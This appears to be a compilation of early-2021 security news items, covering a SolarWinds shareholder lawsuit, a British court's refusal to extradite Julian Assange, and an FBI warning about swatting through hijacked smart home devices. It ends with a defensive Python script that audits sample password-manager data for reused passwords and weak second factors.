Meanwhile, SolarWinds is facing further fallout after a shareholder of the IT infrastructure management software company filed a class-action lawsuit in the U.S. District Court for the Western District of Texas on Monday against its president, Kevin Thompson, and chief financial officer, J. Barton Kalsu, claiming the executives violated federal securities laws under the Securities Exchange Act of 1934.
The complaint states that SolarWinds failed to disclose that "since mid-2020, SolarWinds Orion monitoring products had a vulnerability that allowed hackers to compromise the server upon which the products ran," and that "SolarWinds' update server had an easily accessible password of 'solarwinds123'," as a result of which the company "would suffer significant reputational harm."
British Court rejects the US’s request to extradite Julian Assange
5.1.2021 BigBrothers Securityaffairs
A British court has rejected the request of the US government to extradite Wikileaks founder Julian Assange to the country.
WikiLeaks founder Julian Assange should not be extradited to the US to stand trial: the Westminster Magistrates’ Court rejected the US government’s request to extradite him on charges related to illegally obtaining and sharing classified material about national security.
Assange faces multiple criminal charges under America’s Espionage Act and Computer Fraud and Abuse Act.
Judge Vanessa Baraitser denied the extradition because of the suicide risk Assange would face under the conditions of a U.S. prison.
“That extradition should be refused because it would be unjust and oppressive by reason of Mr. Assange’s mental condition and the high risk of suicide pursuant to section 91 of the EA 2003,” said District Judge (Magistrates’ Court) Vanessa Baraitser in the Westminster Magistrates’ Court.
“Taking account of all of the information available to him, he considered Mr Assange’s risk of suicide to be very high should extradition become imminent. This was a well-informed opinion carefully supported by evidence and explained over two detailed reports.”
Of course, the U.S. government will likely appeal the decision.
The WikiLeaks founder is currently facing extradition to the United States for his role in one of the largest compromises of classified information in the history of the United States. He published thousands of classified diplomatic and military documents on WikiLeaks in 2010.
For the first time, the US DoJ charged an individual under the 102-year-old Espionage Act, which prosecutes the disclosure of national defense information that could be used against the United States.
According to the DoJ, the WikiLeaks founder conspired with and tried to recruit Anonymous and LulzSec hackers to steal confidential and secret data on his behalf. In 2010, Assange gained unauthorized access to a government computer system of a NATO country, and years later he contacted a LulzSec leader who was working for the FBI and provided him with a list of targets.
The US authorities also accuse Assange of having conspired with Army intelligence analyst Chelsea Manning to crack a password hash for an Army computer to access classified documents that were later published on the WikiLeaks website.
In April 2019, WikiLeaks founder Julian Assange was arrested at the Ecuadorian Embassy in London after Ecuador withdrew his asylum following seven years there.
In 2012 a British judge ruled that WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault there, but Assange received political asylum from Ecuador and spent the following years in its London embassy.
In May 2019, the WikiLeaks founder was sentenced to 50 weeks in prison for breaching his bail conditions in 2012 and taking asylum in Ecuador’s London embassy for more than seven years.
A few weeks later, the United States Department of Justice charged Assange with 18 counts on the alleged violation of the Espionage Act.
UK Judge Refuses US Extradition of WikiLeaks Founder Assange
5.1.2021 BigBrothers Securityweek
A British judge on Monday rejected the United States’ request to extradite WikiLeaks founder Julian Assange to face espionage charges, saying he was likely to kill himself if held under harsh U.S. prison conditions.
In a mixed ruling for Assange and his supporters, District Judge Vanessa Baraitser rejected defense arguments that the 49-year-old Australian faces a politically motivated American prosecution that rides roughshod over free-speech protections. But she said Assange’s precarious mental health would likely deteriorate further under the conditions of “near total isolation” he would face in a U.S. prison.
“I find that the mental condition of Mr. Assange is such that it would be oppressive to extradite him to the United States of America,” the judge said.
She said Assange was “a depressed and sometimes despairing man” who had the “intellect and determination” to circumvent any suicide prevention measures taken by American prison authorities.
The U.S. government said it would appeal the decision. Assange’s lawyers said they would ask for his release from a London prison, where he has been held for more than 18 months, at a bail hearing on Wednesday.
Assange, who sat quietly in the dock at London’s Central Criminal Court for the ruling, wiped his brow as the decision was announced. His partner Stella Moris, with whom he has two young sons, wept.
Outside court, Moris said the ruling was “the first step towards justice,” but it was not yet time to celebrate.
“I had hoped that today would be the day that Julian would come home,” she said. “Today is not that day, but that day will come soon.”
The ruling marks a dramatic moment in Assange’s years-long legal battles in Britain — though likely not its final chapter.
It’s unclear whether the incoming Biden administration will pursue the prosecution, initiated under President Donald Trump.
Assange’s American lawyer, Barry Pollack, said the legal team was “enormously gratified” by the British court’s decision.
“We hope that after consideration of the U.K. court’s ruling, the United States will decide not to pursue the case further,” he said.
Moris urged Trump to pardon Assange before he leaves office later this month.
“Mr. President, tear down these prison walls,” she said. “Let our little boys have their father.”
U.S. prosecutors have indicted Assange on 17 espionage charges and one charge of computer misuse over WikiLeaks’ publication of leaked military and diplomatic documents a decade ago. The charges carry a maximum sentence of 175 years in prison.
Lawyers for Assange argue that he was acting as a journalist and is entitled to First Amendment protections of freedom of speech for publishing documents that exposed U.S. military wrongdoing in Iraq and Afghanistan.
Lawyers for the U.S. government denied that Assange was being prosecuted merely for publishing, saying the case “is in large part based upon his unlawful involvement” in the theft of the diplomatic cables and military files by U.S. Army intelligence analyst Chelsea Manning.
The British judge sided with U.S. lawyers on that score, saying Assange’s actions, if proven, would “amount to offenses in this jurisdiction that would not be protected by his right to freedom of speech.” She also said the U.S. judicial system would give him a fair trial.
The defense also argued during a three-week hearing in the fall that Assange risked “a grossly disproportionate sentence” and detention in “draconian and inhumane conditions” if he was sent to the United States.
The judge agreed that U.S. prison conditions would be oppressive. She accepted evidence from expert witnesses that Assange had a depressive disorder and an autism spectrum disorder.
“I accept that oppression as a bar to extradition requires a high threshold. ... However, I am satisfied that, in these harsh conditions, Mr. Assange’s mental health would deteriorate causing him to commit suicide with the ‘single minded determination’ of his autism spectrum disorder,” the judge said in her ruling.
The prosecution of Assange has been condemned by journalists and human rights groups, who say it undermines free speech around the world.
They welcomed the judge’s decision, even though it was not made on free-speech grounds.
“This is a huge relief to anyone who cares about the rights of journalists,” The Freedom of the Press Foundation tweeted.
Assange’s legal troubles began in 2010, when he was arrested in London at the request of Sweden, which wanted to question him about allegations of rape and sexual assault made by two women. In 2012, Assange jumped bail and sought refuge inside the Ecuadorian Embassy, where he was beyond the reach of U.K. and Swedish authorities — but also effectively a prisoner, unable to leave the tiny diplomatic mission in London’s tony Knightsbridge area.
The relationship between Assange and his hosts eventually soured, and he was evicted from the embassy in April 2019. British police immediately arrested him for breaching bail in 2012.
Sweden dropped the sex crimes investigations in November 2019 because so much time had elapsed, but Assange has remained in London’s high-security Belmarsh Prison throughout his extradition hearing.
British Court Rejects U.S. Request to Extradite WikiLeaks' Julian Assange
5.1.2021 BigBrothers Thehackernews
A British court has rejected the U.S. government's request to extradite Wikileaks founder Julian Assange to the country on charges pertaining to illegally obtaining and sharing classified material related to national security.
In a hearing at Westminster Magistrates' Court today, Judge Vanessa Baraitser denied the extradition on the grounds that Assange is a suicide risk and extradition to the U.S. prison system would be oppressive.
"I find that the mental condition of Mr. Assange is such that it would be oppressive to extradite him to the United States of America," Judge Baraitser said in a 132-page ruling.
The U.S. government is expected to appeal the decision.
The case against Assange centers on WikiLeaks' publication of hundreds of thousands of leaked documents about the Afghanistan and Iraq wars, as well as diplomatic cables, in 2010 and 2011.
The documents include "approximately 90,000 Afghanistan war-related significant activity reports, 400,000 Iraq war-related significant activities reports, 800 Guantanamo Bay detainee assessment briefs, and 250,000 U.S. Department of State cables," per the U.S. Department of Justice, which accused Assange of conspiring with Chelsea Manning, a former intelligence analyst in the U.S. Army, to disclose sensitive information related to the national defense.
A federal grand jury last May indicted Assange on 18 counts related to unlawfully obtaining, receiving, and disclosing classified information, and conspiracy to commit computer intrusion to crack a password hash stored on U.S. Department of Defense computers connected to the Secret Internet Protocol Network (SIPRNet), a U.S. government network used to transmit classified documents and communications.
Assange, who sought refuge in the Embassy of Ecuador in London between June 2012 and April 2019 to avoid a warrant against him, was arrested last year after Ecuador withdrew his diplomatic asylum. In May 2019, he was found guilty in a U.K. court of breaching bail conditions and sentenced to 50 weeks, following which the aforementioned indictment was returned in the U.S.
If convicted, Assange faces a maximum penalty of 10 years in prison on each count with the exception of conspiracy to commit computer intrusion, for which he faces a maximum sentence of five years in prison.
The U.S. non-profit Freedom of the Press Foundation tweeted, "The case against Julian Assange is the most dangerous threat to U.S. press freedom in decades. This is a huge relief to anyone who cares about the rights of journalists."
FBI warns swatting attacks on owners of smart devices
3.1.2021 BigBrothers Securityaffairs
The Federal Bureau of Investigation (FBI) is warning owners of smart home devices with voice and video capabilities of ‘swatting’ attacks.
The FBI has recently issued an alert to warn owners of smart home devices with voice and video capabilities of so-called “swatting” attacks.
Swatting attacks consist of hoax calls made to emergency services, typically reporting an immediate threat to human life, to trigger an immediate response from law enforcement and the S.W.A.T. team to a specific location.
Unfortunately, the risk to the people at the targeted location is high because of the confusion on the part of homeowners or responding officers. In some cases, these hoaxes have resulted in health-related or violent consequences, and they also divert law enforcement resources away from real emergencies.
Motivations behind swatting attacks include revenge, harassment, or pranks.
The attackers leverage spoofing technology to anonymize their own phone numbers and make the emergency call appear to come from the victim’s phone number.
According to the alert issued by the FBI, the swatters have been hijacking smart devices such as video- and audio-capable home surveillance devices.
Threat actors likely take advantage of customers’ bad habit of re-using their email passwords for their smart devices. The offenders use stolen email passwords to log into the smart devices and take them over; in some cases they hijacked the live-stream camera and device speakers.
Swatters then call emergency services to report a crime at the victims’ residence urging the intervention of law enforcement.
“Recently, offenders have been using victims’ smart devices, including video and audio capable home surveillance devices, to carry out swatting attacks. To gain access to the smart devices, offenders are likely taking advantage of customers who re-use their email passwords for their smart device. The offenders use stolen email passwords to log into the smart device and hijack features, including the live-stream camera and device speakers.” reads the alert issued by the FBI.
“They then call emergency services to report a crime at the victims’ residence. As law enforcement responds to the residence, the offender watches the live stream footage and engages with the responding police through the camera and speakers. In some cases, the offender also live streams the incident on shared online community platforms. The FBI is working with private sector partners who manufacture smart devices to advise customers about the scheme and how to avoid being victimized. The FBI is also working to alert law enforcement first responders to this threat so they may respond accordingly.”
The FBI has been working with the manufacturers of the targeted smart devices to warn their customers about the threat of swatting attacks and provide them with recommendations on how to protect their devices from being hijacked.
The FBI recommends that users enable two-factor authentication (2FA) for smart devices exposed online. The FBI also recommends that customers not use an email account as the second factor in 2FA, and instead use a mobile device number.
“Users of smart home devices with cameras and/or voice capabilities are advised of the following guidance to maximize security,” the alert concludes.
Because offenders are using stolen email passwords to access smart devices, users should practice good cyber hygiene by ensuring they have strong, complex passwords or passphrases for their online accounts, and should not duplicate the use of passwords between different online accounts. Users should update their passwords on a regular basis.
Users should enable two-factor authentication for their online accounts and on all devices accessible through an internet connection in order to reduce the chance a criminal could access their devices.
It is highly recommended that the user’s second factor for two-factor or multi-factor authentication be a mobile device number and not a secondary e-mail account.
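The three guidance points above (no password reuse, strong passwords, and a second factor that is not an e-mail account) can be checked mechanically against a password-manager export. The following Python audit is an added example written for this page, not code from the FBI alert or from any device vendor; the vault entries and the `mfa_method` labels are constructed sample data, and the 12-character minimum is an assumed policy threshold.

```python
"""Audit a password-manager export for the hygiene points in the FBI alert:
reused passwords, short passwords, and an e-mail account (or nothing) used
as the second factor. All data below is constructed for illustration."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class VaultEntry:
    service: str
    username: str
    password: str
    mfa_method: str  # assumed labels: "none", "email", "sms", "totp", "hardware_key"


MIN_LENGTH = 12  # assumed policy threshold, not a value from the alert

# Constructed sample vault; these are not real credentials.
SAMPLE_VAULT = [
    VaultEntry("mail.example", "alice", "Summer2020!Sun", "none"),
    VaultEntry("camera.example", "alice", "Summer2020!Sun", "email"),
    VaultEntry("doorbell.example", "alice", "hunter2", "sms"),
    VaultEntry("bank.example", "alice", "c0rrect-h0rse-battery-staple", "totp"),
]


def find_reused_passwords(vault):
    """Return groups of services that share one password, without echoing
    the password itself. Sharing the mail password with a camera account
    is exactly the reuse the alert describes."""
    by_password = defaultdict(list)
    for entry in vault:
        by_password[entry.password].append(entry.service)
    return sorted(sorted(svcs) for svcs in by_password.values() if len(svcs) > 1)


def find_weak_second_factor(vault):
    """Services with no second factor, or one tied to an e-mail account.
    An e-mail second factor falls with the same stolen e-mail password."""
    return [e.service for e in vault if e.mfa_method in ("none", "email")]


def find_short_passwords(vault, min_length=MIN_LENGTH):
    """Services whose password is shorter than the assumed minimum."""
    return [e.service for e in vault if len(e.password) < min_length]


def audit(vault):
    """Run all three checks and return the findings keyed by check name."""
    return {
        "reused": find_reused_passwords(vault),
        "weak_mfa": find_weak_second_factor(vault),
        "short": find_short_passwords(vault),
    }


if __name__ == "__main__":
    for check, findings in audit(SAMPLE_VAULT).items():
        print(f"{check}: {findings}")
```

Run against the sample vault, the audit flags the mail and camera accounts as sharing a password, the mail (no second factor) and camera (e-mail second factor) accounts as weak on MFA, and the doorbell account for its short password. Reuse is reported as service groups rather than the passwords themselves so the report can be shared without leaking secrets.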